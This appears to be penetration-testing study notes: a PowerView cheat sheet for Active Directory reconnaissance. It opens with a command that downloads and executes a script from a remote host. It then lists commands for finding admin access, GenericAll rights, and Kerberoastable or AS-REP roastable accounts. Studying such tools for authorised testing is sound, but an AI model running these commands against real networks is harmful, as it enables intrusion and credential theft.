🔎Powerview

IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/PowerView.ps1')

Import-Module .\PowerView.ps1

loading module to powershell, if it gives error then change execution policy

• Basic information about the domain:

Get-NetDomain

• List of all users in the domain:

Get-NetUser 

The above command's outputs can be filtered using "select" command. For example,

Get-NetUser | select cn

here cn is side-heading for the output of above command. we can select any number of them separated by comma.

• Specific User

Get-NetUser "user"

• Enumerate domain groups

Get-NetGroup

• Information from specific group

Get-NetGroup "group name"

• Enumerate the computer objects in the domain

Get-NetComputer

• Scans the network in an attempt to determine if our current user has administrative permissions on any computers in the domain

Find-LocalAdminAccess

• Checking logged on users with Get-NetSession, adding verbosity gives more info.

Get-NetSession -ComputerName files04 -Verbose

• Listing SPN accounts in domain

Get-NetUser -SPN | select samaccountname,serviceprincipalname

• Enumerates ACE(access control entities), lists SID(security identifier). ObjectSID

Get-ObjectAcl -Identity <user>

• Converting SID/ObjSID to name

Convert-SidToName <sid/objsid>

• Checking for "GenericAll" right for a specific group, after obtaining they can be converted using convert-sidtoname

Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights 

• Find the shares in the domain

Find-DomainShare

• Identifying AS-REP roastable accounts

Get-DomainUser -PreauthNotRequired -verbose

• Kerberoastable accounts

Get-NetUser -SPN | select serviceprincipalname